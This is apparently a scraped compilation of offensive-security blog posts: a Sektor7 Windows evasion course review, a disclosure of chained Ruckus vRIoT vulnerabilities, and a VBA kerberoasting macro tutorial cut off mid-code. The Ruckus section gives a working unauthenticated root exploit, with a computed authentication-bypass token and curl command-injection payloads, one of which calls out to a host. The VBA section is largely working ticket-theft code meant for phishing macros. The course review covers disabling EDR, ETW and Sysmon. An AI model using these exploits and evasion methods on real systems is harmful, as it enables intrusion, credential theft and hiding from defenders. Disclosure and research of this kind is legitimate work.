Downloading and Exploring AWS EBS Snapshots
The post Downloading and Exploring AWS EBS Snapshots appeared first on Rhino Security Labs.
The post Downloading and Exploring AWS EBS Snapshots appeared first on Rhino Security Labs.
Another Sektor7 course, another review! This time it’s the RED TEAM Operator: Windows Evasion Course. You can catch my previous reviews of the RTO: Malware Development Essentials and RTO: Malware Development Intermediate courses as well.
This course, like the previous ones, builds on the knowledge gained in the previous courses. You don’t need to have taken the others if you already have a background in malware development, C++, assembly, and debugging, but if you haven’t, this will very likely be too advanced. The Essentials course might be much more your speed.
Here’s what Windows Evasion covers, according to the course page:
- How a modern detection looks like
- How to get rid of process' internal operations monitoring
- How to make your payload look benign in memory
- How to break process parent-child relation
- How to disrupt EPP/EDR logging
- What is Sysmon and how to bypass it
The course is split into 3 main sections: essentials, non-privileged user vector, and high-privileged user vector. I’ll cover each one, and then provide some thoughts on the course as a whole and the value it provides.
The course begins as usual, with links to the code and a custom VM with all the tools you’ll need. The first lesson is detail on how modern EDR detection works, covering the different user-mode and kernel-mode components, static analysis, DLL injection, hooking, kernel callbacks, logging, and machine learning. This is as good an overview of the end to end setup of EDRs as I’ve seen. It lays the foundation for the subsequent topics in a nice logical way. It also covers the differences between EDRs and AV, how Sysmon fits in, and how the line between AV and EDRs is becoming more blurred.
Next in essentials, the focus is on defeating various static analysis techniques, specifically entropy, image file details, and code signing. The idea is to make your malicious binary as similar to known-good binaries as possible, with special attention paid the the elements that are commonly flagged by static analysis. None of this is ground-breaking or totally novel, but it does drive home the idea that details matter, and they can add up to successfully achieving execution on a target or being caught.
The second section covers a range of techniques that can be performed without needing elevated privileges. It begins with an explanation and demonstration via debugger of system call hooking, as performed by the main AV/EDR stand-in for the course, BitDefender. Bitdefender is a good option here, as a trial license is freely available, and it does more EDR-like things than a normal AV, like hooking.
Next, several different methods of defeating user-mode hooking are demonstrated, beginning with the classic overwriting of the .text section of ntdll.dll
, which I’ve also covered here. The main disadvantage of this method is the need to map an additional new copy of ntdll.dll
into the process address space, which is rather unusual from an AV/EDR perspective.
One alternative to this is to use Hell’s Gate, by Am0nsec and Smelly. This method uses some clever assembly to dynamically resolve the syscall number of a given function from the local copy of ntdll.dll
and execute it. However this method has some drawbacks as well, mainly the fact that it will fail if the function to be resolved has already been hooked.
Reenz0h has a neat new modification (new to me at least!) to Hell’s Gate that gets around this problem, which he calls Halo’s Gate. It takes advantage of the fact that the system calls contained within ntdll.dll
are sorted in numerically ascending order. The trick is to identity that a syscall has been hooked by checking for the jmp
opcode (0xE9
), and then traversing ntdll.dll
both ahead and behind the target syscall. If an unhooked syscall is found 8 functions after the target, and its value is 0xFD
, then by subtracting 8 from 0xFD
, the the resulting 0xFD
is our target syscall number. The same applies for a syscall before the target function. As no EDR hooks every syscall, eventually a clean one will be found and the target syscall number can be successfully calculated. This property of ordered syscall numbers in ntdll.dll
is exploited to great effect in Syswhispers2. It was originally documented by the prolific modxp in a blog post here.
The last method of unhooking is a twist on the first, named, and I quote, “Perun’s Fart”. The goal is to get a clean copy of ntdll.dll
without mapping it into our process again. It turns out that if a process is created in a suspended state, ntdll.dll
is mapped by the Windows loader as part of the normal new process creation flow, but EDR hooks are not applied, since the main thread has not yet begun execution. So we can steal its copy of ntdll.dll
and overwrite our local hooked version. Obviously this is a trade off, as this method will create a new process and involve cross-process memory reads. Still, it’s good to have multiple options when it comes to unhooking.
Next up is coverage of Event Tracing for Windows (ETW), how it can rat you out to AV/EDR, and how to blind it in your local process. ETW is especially relevant when executing .NET assemblies, such as in Cobalt Strike’s execute-assembly
, as it can inform defenders of the exact assembly name and methods executed. The solution in this case is simple: Patch the ETWEventWrite
function to return early with 0 in the RAX
register. Anytime an ETW event is sent by the process, it will always succeed, without actually sending the message. Sweet and simple.
The last few videos of Section 2 cover different methods of hiding some specific indicators that can reveal the presence of malicious activity. First is module stomping. This is a way of executing shellcode from within a loaded DLL, avoiding the telltale sign of memory allocations within the process that are not backed by files on disk. A DLL that the host process does not use is loaded, then partially hollowed out and replaced with shellcode. Since the original DLL is properly loaded, no indication of injected shellcode is present.
Lastly this section covers hiding parent-child process ID relationships. The usual method is covered for PPID spoofing, using UpdateProcThreadAttribute
to set the PPID to an arbitrary parent process. However two other methods I’d not encountered were covered as well. First, it turns out that processes created by the Windows task scheduler become a parent of the task scheduler svchost.exe
process, and code is provided to use the Win32 API to execute a payload this way. The other method is one used by Emotet, which uses COM to programatically run WMI and create a new process. The parent in this case is the WmiPrvSE.exe
process.
This section covers a variety of techniques that are available in high-privilege contexts. The focus is on Windows Eventlog, interrupting AV/EDR network communication, and Sysmon.
One video covers a method of hiding your activities from the Windows Eventlog. The idea is that the service that service responsible for Eventlog, Windows Event Log
, has several threads that handle the processing of event log messages. By suspending these threads, the service continues to run, but does not process any events, thus hiding our activity. One caveat is that if the threads are resumed, all events that were missed in the interim will be processed, unless the machine is rebooted.
The next section looks at severing the connection between AV/EDR and its remote monitoring/logging server. This is done in two primary ways: adding Windows Firewall rules, and sink-holing traffic via the routing table. These two are pretty self-explanatory, but the real value here is the code samples provided for doing this in C/C++. The infamous and terrible COM is used in several places, and provides a good working example of COM programming. Creating routing table entries is actually a simple Win32 API call away.
The final section of the course covers identifying and neutralizing Sysmon. Sysmon is an excellent tool and frequently the backbone of many AV/EDR collection strategies, so identifying its presence and disabling its capabilities can go a long way in hiding your activities.
One problem for attackers is that Sysmon by design can be concealed in various ways. The name of the user-mode process, the minifilter driver name, and its altitude can all be modified to hide Sysmon’s presence. However there are enough reliable ways, like checking registry keys, to identify it. Code and commands are provided to find the registry keys and several techniques for shutting down Sysmon as well. One is to unload the minifilter driver. Another harks back to earlier in the course and shows how to patch our friend ETWEventWrite
.
If you’ve read my other reviews of Sektor7 courses, you know what I’m going to say here. They are fantastic, and a fantastic value for the money as well, as most are around $200-250 USD. You can buy all 5 current courses for less than almost any other training out there, and 2573 times less than a single SANS course. You get lifetime access, and most importantly, the code samples. This to me is by far the single most valuable part of the course. Reenz0h is a great instructor with a wealth of knowledge and a great presentation style, but the true gift he gives you is a firm foundation of working code samples to build from and the context of how they are used. This course specifically covers basic COM programming in as understandable a way as COM can be covered, in my opinion. I’ve found that I learn best when I have some working code to tweak, play with, lookup its functions on MSDN, and mold it until it does what I want. No, the samples are not production ready and undetectable in every case, but these course give you the tools to make them that way and integrate them into your own tooling.
Props again to reenz0h and the Sektor7 crew. I’m glad they took a poll of their students and delivered a more advanced course. I get the feeling there is a ton more advanced material they could crank out, and I can’t wait for it.
Dear Fellowlship, today’s homily is about two vulnerabilites (CVE-2020-26878 and CVE-2020-26879) found in Ruckus vRIoT, that can be chained together to get remote command execution as root. Please, take a seat and listen to the story.
We reported the vulnerability to the Ruckus Product Security Team this summer (26/Jul/2020) and they instantly checked and acknowledged the issues. After that, both parts agreed to set the disclosure date to October the 26th (90 days). We have to say that the team was really nice to us and that they kept us informed every month. If only more vendors had the same good faith.
Every day more people are turning their homes into “Smart Homes”, so we are developing an immeasurable desire to find vulnerabilities in components that manage IoT devices in some way. We discovered the “Ruckus IoT Suite” and wanted to hunt for some vulnerabilities. We focused in Ruckus IoT Controller (Ruckus vRIoT), which is a virtual component of the “IoT Suite” in charge of integrating IoT devices and IoT services via exposed APIs.
This software is provided as a VM in OVA format (Ruckus IoT 1.5.1.0.21 (GA) vRIoT Server Software Release), so it can be run by VMware and VirtualBox. This is a good way of obtaining and analyzing the software, as it serves as a testing platform.
Our first step is to perform a bit of recon to check the attack surface, so we run the OVA inside a hypervisor and execute a simple port scan to list exposed services:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack nginx
443/tcp open ssl/http syn-ack nginx
4369/tcp open epmd syn-ack Erlang Port Mapper Daemon
5216/tcp open ssl/http syn-ack Werkzeug httpd 0.12.1 (Python 3.5.2)
5672/tcp open amqp syn-ack RabbitMQ 3.5.7 (0-9)
9001/tcp filtered tor-orport no-response
25672/tcp open unknown syn-ack
27017/tcp filtered mongod no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are some interesting services. If we try to log in via SSH (admin/admin), we obtain a restricted menu where we can barely do anything:
1 - Ethernet Network
2 - System Details
3 - NTP Setting
4 - System Operation
5 - N+1
6 - Comm Debugger
x - Log Off
So our next step should be to get access to the filesystem and understand how this software works. We could not jailbreak the restricted menu, so we need to extract the files in a less fancy way: let’s sharpen our claws to gut the vmdk files.
In the end an OVA file is just a package that holds all the components needed to virtualize a system, so we can extract its contents and mount the virtual machine disk with the help of qemu and the NBD driver.
7z e file.ova
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 file.vmdk
sudo mount /dev/nbd1p1 /mnt
If that worked you can now access the whole filesystem:
psyconauta@insulanova:/mnt|⇒ ls
bin data home lib64 mqtt-broker root srv usr VRIOT
boot dev initrd.img lost+found opt run sys var vriot.d
cafiles etc lib mnt proc sbin tmp vmlinuz
We can see in the /etc/passwd file that the user “admin” does not have a regular shell:
admin:x:1001:1001::/home/admin:/VRIOT/ops/scripts/ras
That ras
file is a bash script that corresponds to the restricted menu that we saw before.
BANNERNAME=" Ruckus IoT Controller"
MENUNAME=" Main Menu"
if [ $TERM = "ansi" ]
then
set TERM=vt100
export TERM
fi
main_menu () {
draw_screen
get_input
check_input
if [ $? = 10 ] ; then main_menu ; fi
}
##------------------------------------------------------------------------------------------------
draw_screen () {
clear
echo "*******************************************************************************"
echo "$BANNERNAME"
echo "$MENUNAME"
echo "*******************************************************************************"
echo ""
echo "1 - Ethernet Network"
echo "2 - System Details"
echo "3 - NTP Setting"
echo "4 - System Operation"
echo "5 - N+1"
echo "6 - Comm Debugger"
echo "x - Log Off"
echo
echo -n "Enter Choice: "
}
...
Usually all these IoT routers/switches/etc with web interface contain functions that execute OS commands using user-controlled input. That means that if the input is not correctly sanitized, we can inject arbitrary commands. This is the lowest hanging fruit that always has to be checked, so our first task is to find the files related to the web interface:
psyconauta@insulanova:/mnt/VRIOT|⇒ find -iname "*web*" 2> /dev/null
./frontend/build/static/media/fontawesome-webfont.912ec66d.svg
./frontend/build/static/media/fontawesome-webfont.af7ae505.woff2
./frontend/build/static/media/fontawesome-webfont.674f50d2.eot
./frontend/build/static/media/fontawesome-webfont.b06871f2.ttf
./frontend/build/static/media/fontawesome-webfont.fee66e71.woff
./ops/packages_151/node_modules/faye-websocket
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket.js
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocketServer.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocket.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/mqtt/test/websocket_client.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/websocket-stream
./ops/packages_151/node_modules/sockjs/lib/webjs.js
./ops/packages_151/node_modules/sockjs/lib/trans-websocket.js
./ops/packages_151/node_modules/websocket-extensions
./ops/packages_151/node_modules/websocket-extensions/lib/websocket_extensions.js
./ops/packages_151/node_modules/node-red-contrib-web-worldmap
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.svg
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff2
./ops/packages_151/node_modules/websocket-driver
./ops/packages_151/node_modules/websocket-driver/lib/websocket
./ops/docker/webservice
./ops/docker/webservice/web_functions.py
./ops/docker/webservice/web_functions_helper.py
./ops/docker/webservice/web.py
This way we identified several web-related files, and that the web interface is built on top of python scripts. In python there are lots of dangerous functions that, when used incorrectly, can lead to arbitrary code/command execution. The easy way is to try to find os.system()
calls with user-controlled data in the main web file. A simple grep will shed light:
psyconauta@insulanova:/mnt/VRIOT|⇒ grep -i "os.system" ./ops/docker/webservice/web.py -A 5 -B 5
reqData = json.loads(request.data.decode())
except Exception as err:
return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
userpwd = 'useradd '+reqData['username']+' ; echo "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
#call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
os.system(userpwd)
call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
except Exception as err:
print("err=",err)
devNullFile.close()
return errorResponseFactory(str(err), status=400)
--
slave_ip = reqData['slave_ip']
if reqData['slave_ip'] != config.get("vm_ipaddress"):
master_ip = reqData['slave_ip']
slave_ip = reqData['master_ip']
crontab_str = "crontab -l | grep -q 'ha_slave.py' || (crontab -l ; echo '*/5 * * * * python3 /VRIOT/ops/scripts/haN1/ha_slave.py 1 "+master_ip+" "+slave_ip+" >> /var/log/cron_ha.log 2>&1') | crontab -"
os.system(crontab_str)
#os.system("python3 /VRIOT/ops/scripts/haN1/n1_process.py > /dev/null 2>&1 &")
except Exception as err:
devNullFile.close()
return errorResponseFactory(str(err), status=400)
else:
devNullFile.close()
--
call(['rm','-rf','/etc/corosync/authkey'],stdout=devNullFile)
call(['rm','-rf','/etc/corosync/corosync.conf'],stdout=devNullFile)
call(['rm','-rf','/etc/corosync/service.d/pcmk'],stdout=devNullFile)
call(['rm','-rf','/etc/default/corosync'],stdout=devNullFile)
crontab_str = "crontab -l | grep -v 'ha_slave.py' | crontab -"
os.system(crontab_str)
cmd = "supervisorctl status all | awk '{print $1}'"
process_list = check_output(cmd,shell=True).decode('utf-8').split("\n")
for process in process_list:
if process and process != 'nplus1_service':
--
call(['service','sshd','stop'])
config.update("vm_ssh_enable","0")
call(['supervisorctl','restart','app:mqtt_service'])
call(['supervisorctl', 'restart', 'celery:*'])
if reqData["vm_ssh_enable"] == "0":
os.system("kill $(ps aux | grep 'ssh' | awk '{print $2}')")
except Exception as err:
return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
elif request.method == 'GET':
response_json = {
"offline_upgrade_enable" : config.get("offline_upgrade_enable"),
The first occurrence already looks like vulnerable to command injection. When checking that code snippet we can observe that it is in fact vulnerable:
@app.route("/service/v1/createUser",methods=['POST'])
@token_required
def create_ha_user():
try:
devNullFile = open(os.devnull, 'w')
try:
reqData = json.loads(request.data.decode())
except Exception as err:
return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
userpwd = 'useradd '+reqData['username']+' ; echo "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
#call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
os.system(userpwd)
call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
except Exception as err:
print("err=",err)
devNullFile.close()
We can see how, when calling the /service/v1/createUser endpoint, some parameters are directly taken from the POST request body (JSON-formatted) and concatenated to a os.system()
call. As this concatenation is done without proper sanitization, we can inject arbitrary commands with ;
. The vulnerability is easily confirmed using an HTTP server (python -m SimpleHTTPServer
) as canary:
curl https://host/service/v1/createUser -k --data '{"username": ";curl http://TARGET:8000/pwned;#", "password": "test"}' -H "Authorization: Token 47de1a54fa004793b5de9f5949cf8882" -H "Content-Type: application/json"
Keep in mind that this method checks for a valid token (see the @token_required
at line two of the snippet), so we need to be authenticated in order to exploit it. Our next step is to find a way to circumvent this check to get an RCE as an unauthenticated user.
The first step to find a bypass would be to check the token_required
function in order to understand how this “check” is performed:
def token_required(f):
@wraps(f)
def wrapper(*args, **kwargs):
# Localhost Authentication
if(request.headers.get('X-Real-Ip') == request.headers.get('host')):
return f()
# init call
if(request.path == '/service/init' and request.method == 'POST'):
return f()
if(request.path == '/service/upgrade/flow' and request.method == 'POST'):
return f()
# N+1 Authentication
if "Token " not in request.headers.get('Authorization'):
print('Auth='+request.headers.get('Authorization'))
token = crpiot_obj.decrypt(request.headers.get('Authorization'))
print('Token='+token)
with open("/VRIOT/ops/scripts/haN1/service_auth") as fileobj:
auth_code = fileobj.read().rstrip()
if auth_code == token:
return f()
# Normal Authentication
k = requests.get("https://0.0.0.0/app/v1/controller/stats",headers={'Authorization': request.headers.get('Authorization')},verify=False)
if(k.status_code != 200):
return Response(json.dumps({"detail": "Invalid Token."}), 401)
else:
return f()
return wrapper
Let’s ignore the header comparison :) and focus in the N+1 authentication. As you can see, if the Authorization header does not contain the word “Token”, the header value is decrypted and compared with a hardcoded value from a file (/VRIOT/ops/scripts/haN1/service_auth
). The encryption / decryption routines can be found in the file /VRIOT/ops/scripts/enc_dec.py
:
def __init__(self, salt='nplusServiceAuth'):
self.salt = salt.encode("utf8")
self.enc_dec_method = 'utf-8'
self.str_key=config.get('n1_token').encode("utf8")
def encrypt(self, str_to_enc):
try:
aes_obj = AES.new(self.str_key, AES.MODE_CFB, self.salt)
hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
mret = b64encode(hx_enc).decode(self.enc_dec_method)
return mret
except ValueError as value_error:
if value_error.args[0] == 'IV must be 16 bytes long':
raise ValueError('Encryption Error: SALT must be 16 characters long')
elif value_error.args[0] == 'AES key must be either 16, 24, or 32 bytes long':
raise ValueError('Encryption Error: Encryption key must be either 16, 24, or 32 characters long')
else:
raise ValueError(value_error)
The n1_token
value can be found by grepping (spoiler: it is serviceN1authent). With all this information we can go to our python console and create the magic value:
>>> from Crypto.Cipher import AES
>>> from base64 import b64encode, b64decode
>>> salt='nplusServiceAuth'
>>> salt = salt.encode("utf8")
>>> enc_dec_method = 'utf-8'
>>> str_key = 'serviceN1authent'
>>> aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
>>> hx_enc = aes_obj.encrypt('TlBMVVMx'.encode("utf8"))# From /VRIOT/ops/scripts/haN1/service_auth
>>> mret = b64encode(hx_enc).decode(enc_dec_method)
>>> print mret
OlDkR+oocZg=
So setting the Authorization header to OlDkR+oocZg=
is enough to bypass the token check and to interact with the API. We can combine this backdoor with our remote command injection:
curl https://host/service/v1/createUser -k --data '{"username": ";useradd \"exploit\" -g 27; echo \"exploit\":\"pwned\" | chpasswd >/dev/null 2>&1;sed -i \"s/Defaults rootpw/ /g\" /etc/sudoers;#", "password": "test"}' -H "Authorization: OlDkR+oocZg=" -H "Content-Type: application/json"
And now log in:
X-C3LL@Kumonga:~|⇒ ssh [email protected]
[email protected]'s password:
Could not chdir to home directory /home/exploit: No such file or directory
$ sudo su
[sudo] password for exploit:
root@vriot:/# id
uid=0(root) gid=0(root) groups=0(root)
So… PWNED! >:). We have a shiny unauthenticated RCE as root.
Maybe the vulnerability was easy to spot and easy to exploit, but a root shell is a root shell. And nobody can argue with you when you have a root shell.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how a soul descended into the VBA hell and ended up creating juicy tools. Please, take a seat and listen to the story.
Exposing yourself too much to VBA can be dangerous for your mind and your body. Please talk with your doctor before starting to code something in such crooked language.
Using macros as the first stage of an attack is probably the Top One of tactics. Macros are usually used to deploy implants in order to infect computers, so that attackers can use these first boxes as pivot points and interact with the internal network. Recently a thought started haunting our heads: can we pwn something without dropping any binary or inject code, just launching attacks via Excels?. If time is not a constraint we can send different emails over time with attacks implemented in pure VBA (recon, bruteforcing, kerberoast/asreproast, ACLpwns, etc.).
For example, we can create a macro that interacts with a domain controller via LDAP to retrieve the userlist and exfiltrate the atributes sAMAccountName
and pwdLastSet
. We can turn the pwdLastSet
to something like “Monthyear” (June2020, July2020…) and build a list of usernames and plausible passwords to bruteforce the VPN login. We would only need to send the macro via email to a bunch of employees and wait for the goodies.
Following this hacking in an epistolary way idea, we started to create a macro for kerberoasting. We saw that the internet is full of macros that execute kerberoast attacks, but all of them either drop a binary, or inject a shellcode, or would just call powershell. We wanted to build something in pure VBA. So… let’s go!
This kind of attack is really well explained in tons of articles over the internet, so we are not going to enter in such details here. As briefing we are going to quote the article Kerberos (I): How does Kerberos work? – Theory from our friend @zer1t0:
Kerberoasting is a technique which takes advantage of TGS to crack the user accounts passwords offline. As seen above, TGS comes encrypted with service key, which is derived from service owner account NTLM hash. Usually the owners of services are the computers in which the services are being executed. However, the computer passwords are very complex, thus, it is not useful to try to crack those. This also happens in case of krbtgt account, therefore, TGT is not crackable neither. All the same, on some occasions the owner of service is a normal user account. In these cases it is more feasible to crack their passwords. Moreover, this sort of accounts normally have very juicy privileges. Additionally, to get a TGS for any service only a normal domain account is needed, due to Kerberos not perform authorization checks.
So we need to create a macro that solves two tasks: to list the SPNs whose authentication is related to a user account, and to ask for a TGS ticket for each one. To build our PoC we checked the source code of Mimikatz (kuhl_m_kerberos.c) and this old example of how to ask for TGS tickets in Windows (KList.c).
We are going to need to call three functions from ntsecapi
. First we need to establish an untrusted connection with the LSA server using LsaConnectUntrusted, then we get the authentication package identifier for Kerberos (LsaLookupAuthenticationPackage), and finally we call LsaCallAuthenticationPackage to retrieve the target ticket.
We can check MSDN for information about what parameters those functions need. Of course VBA data types are wicked and can be a bit tricky, but with a bit of googling we can solve it:
Private Declare PtrSafe Function LsaConnectUntrusted Lib "SECUR32" (ByRef LsaHandle As LongPtr) As Long
Private Declare PtrSafe Function LsaLookupAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByRef PackageName As LSA_STRING, ByRef AuthenticationPackage As LongLong) As Long
Private Declare PtrSafe Function LsaCallAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByVal AuthenticationPackage As LongLong, ByVal ProtocolSubmitBuffer As LongPtr, ByVal SubmitBufferLength As Long, ProtocolReturnBuffer As Any, ByRef ReturnBufferLength As Long, ByRef ProtocolStatus As Long) As Long
As stated, types can be a bit tricky. In order to call LsaLookupAuthenticationPackage
we need to use a LSA_STRING
structure, defined as:
typedef struct _LSA_STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} LSA_STRING, *PLSA_STRING;
We don’t have those types in VBA, so we need to fit the structure fields to types with the same size. This structure can be declared as:
Private Type LSA_STRING
Length As Integer
MaximumLength As Integer
Buffer As String
End Type
So the first part of our subroutine to ask TGS tickets would be something like:
Sub askTGS(target As String)
Dim Status As Long
Dim pLogonHandle As LongPtr
Dim Name As LSA_STRING
Dim pPackageId As LongLong
Status = LsaConnectUntrusted(pLogonHandle)
If Status <> 0 Then
MsgBox "Error, LsaConnectUntrusted failed!"
Return
End If
With Name
.Length = Len("Kerberos")
.MaximumLength = Len("Kerberos") + 1
.Buffer = "Kerberos"
End With
Status = LsaLookupAuthenticationPackage(pLogonHandle, Name, pPackageId)
If Status <> 0 Then
MsgBox "Error, LsaLookupAuthenticationPackage failed!"
Return
End If
To retrieve the ticket we need to call LsaCallAuthenticationPackage
with a KERB_RETRIEVE_TKT_REQUEST
struct as message. This struct is defined as:
typedef struct _KERB_RETRIEVE_TKT_REQUEST {
KERB_PROTOCOL_MESSAGE_TYPE MessageType;
LUID LogonId;
UNICODE_STRING TargetName;
ULONG TicketFlags;
ULONG CacheOptions;
LONG EncryptionType;
SecHandle CredentialsHandle;
} KERB_RETRIEVE_TKT_REQUEST, *PKERB_RETRIEVE_TKT_REQUEST;
Also, we need to define the structure UNICODE_STRING
, which is:
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING
And SecHandle
:
typedef struct _SecHandle {
ULONG_PTR dwLower;
ULONG_PTR dwUpper;
} SecHandle, * PSecHandle
We can merge KERB_RETRIEVE_TKT_REQUEST
and UNICODE_STRING
structures to avoid issues, so our structures in VBA will be declared as:
Private Type SecHandle
dwLower As LongPtr
dwUpper As LongPtr
End Type
Private Type KERB_RETRIEVE_TKT_REQUEST
MessageType As KERB_PROTOCOL_MESSAGE_TYPE
LogonIdLower As Long
LogonIdHigher As LongLong
TargetNameLength As Integer
TargetNameMaximumLength As Integer
TargetNameBuffer As LongPtr
TicketFlags As Long
CacheOptions As Long
EncryptionType As Long
CredentialsHandle As SecHandle
End Type
Finally, KERB_PROTOCOL_MESSAGE_TYPE
is just an enum:
Private Enum KERB_PROTOCOL_MESSAGE_TYPE
KerbDebugRequestMessage = 0
KerbQueryTicketCacheMessage
KerbChangeMachinePasswordMessage
KerbVerifyPacMessage
KerbRetrieveTicketMessage
KerbUpdateAddressesMessage
KerbPurgeTicketCacheMessage
KerbChangePasswordMessage
KerbRetrieveEncodedTicketMessage
KerbDecryptDataMessage
KerbAddBindingCacheEntryMessage
KerbSetPasswordMessage
KerbSetPasswordExMessage
KerbVerifyCredentialsMessage
KerbQueryTicketCacheExMessage
KerbPurgeTicketCacheExMessage
KerbRefreshSmartcardCredentialsMessage
KerbAddExtraCredentialsMessage
KerbQuerySupplementalCredentialsMessage
KerbTransferCredentialsMessage
KerbQueryTicketCacheEx2Message
End Enum
Keep in mind that the field defined as TargetNameBuffer
is the PWSTR Buffer
from UNICODE_STRING
, so here we are going to set a pointer to the string that contains the target SPN. The problem is: we do not know where in memory this information will be later, so we are setting this value to something random that will be overwritten with the pointer later on. Other values that we need to set are the encryption (RC4) and the CacheOptions:
'(...)
With KerbRetrieveRequest
.MessageType = KerbRetrieveEncodedTicketMessage
.EncryptionType = 23 'KERB_ETYPE_RC4_HMAC_NT
.CacheOptions = 8 'KERB_RETRIEVE_TICKET_AS_KERB_CRED
.TargetNameLength = LenB(target)
.TargetNameMaximumLength = LenB(target) + 2
.TargetNameBuffer = 1337 'random value, we change it later
End With
'(...)
To work with memory in VBA we use byte arrays. In order to add the target SPN string to the end of our structure, we need to create an array with the size of the struct, then get the pointer to the first element of this array (VarPtr(yourArray(0))
), and use this address as destination (RtlMoveMemory
). Then we convert this byte array to a string (StrConv(array, vbUnicode)
) and concatenate the string with the target SPN. I ended with this weird method because VBA started to freak out in memory: I don’t like how it is done, but it works.
'Copy the struct to an array and add the string with the target
Dim tmpBuffer() As Byte
Dim Dummy As String
ReDim tmpBuffer(0 To LenB(KerbRetrieveRequest) - 1)
Call CopyMemory(VarPtr(tmpBuffer(0)), VarPtr(KerbRetrieveRequest), LenB(KerbRetrieveRequest) - 1)
Dummy = StrConv(tmpBuffer, vbUnicode)
Dummy = Dummy & StrConv(target, vbUnicode)
At this point we have a string composed by our KERB_RETRIEVE_TKT_REQUEST
+ string with SPN
, so we need to convert this to an array again, and get the memory address where our string is located at. Our structure has a size of 64 bytes, so the 65th byte is the first byte of our string: we can use VarPtr()
again to get this value and set the TargetNameBuffer
with this pointer later on:
'Get the buffer memory address
Dim fixedAddress As LongPtr
Dim tempToFix() As Byte
tempToFix = StrConv(Dummy, vbFromUnicode)
fixedAddress = VarPtr(tempToFix(64))
In order to call LsaCallAuthenticationPackage
, our message buffer must be created in the heap, so we need to allocate memory and copy it:
'Alloc memory from heap and copy the struct
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
And finally, we can call the function after overwriting the TargetNameBuffer
field with the address extracted before:
'Fix the buffer address
fixedAddress = mem + 64
Call CopyMemory(mem + 24, VarPtr(fixedAddress), 8)
'Do the call
Status = LsaCallAuthenticationPackage(pLogonHandle, pPackageId, mem, LenB(KerbRetrieveRequest) + LenB(target), KerbRetrieveResponse, ResponseSize, SubStatus)
If Status <> 0 Then
MsgBox "Error, LsaCallAuthenticationPackage failed!"
End If
If everything went smoothly now we have a buffer (KerbRetrieveResponse
) that is a KERB_RETRIEVE_TKT_RESPONSE
structure:
typedef struct _KERB_RETRIEVE_TKT_RESPONSE {
KERB_EXTERNAL_TICKET Ticket;
} KERB_RETRIEVE_TKT_RESPONSE, *PKERB_RETRIEVE_TKT_RESPONSE;
And KERB_EXTERNAL_TICKET
is defined as:
typedef struct _KERB_EXTERNAL_TICKET {
PKERB_EXTERNAL_NAME ServiceName;
PKERB_EXTERNAL_NAME TargetName;
PKERB_EXTERNAL_NAME ClientName;
UNICODE_STRING DomainName;
UNICODE_STRING TargetDomainName;
UNICODE_STRING AltTargetDomainName;
KERB_CRYPTO_KEY SessionKey;
ULONG TicketFlags;
ULONG Flags;
LARGE_INTEGER KeyExpirationTime;
LARGE_INTEGER StartTime;
LARGE_INTEGER EndTime;
LARGE_INTEGER RenewUntil;
LARGE_INTEGER TimeSkew;
ULONG EncodedTicketSize;
PUCHAR EncodedTicket;
} KERB_EXTERNAL_TICKET, *PKERB_EXTERNAL_TICKET;
If we use API Monitor to check this buffer in memory we get something like:
I highlighted a few pointers in green (the first pointers correspond to ServiceName
, TargetName
, ClientName
, etc.), and the value of EncodedTicketSize
in orange. After the EncodedTicketSize
, the pointer (again in green) to the EncodedTicket
. So to get our TGS ticket in KiRBi format (as Mimikatz does, for example) we need to extract the pointer to the encoded ticket (at offset 144) and read the amount of EncodedTicketSize
bytes (this value is at offset 136):
'Ticket->EncodedTicketSize
Dim ticketSize As Integer
Call CopyMemory(VarPtr(ticketSize), VarPtr(Response(136)), 4)
'Ticket->EncodedTicket (address)
Dim encodedTicketAddress As LongPtr
Call CopyMemory(VarPtr(encodedTicketAddress), VarPtr(Response(144)), 8)
'Ticket->EncodedTicket (value)
Dim encodedTicket() As Byte
ReDim encodedTicket(0 To ticketSize)
Call CopyMemory(VarPtr(encodedTicket(0)), encodedTicketAddress, ticketSize)
'Save it
Dim fileName As String
fileName = Replace(target, "/", "_")
fileName = Replace(fileName, ":", "_")
MsgBox fileName
Open fileName & ".kirbi" For Binary Access Write As #1
lWritePos = 1
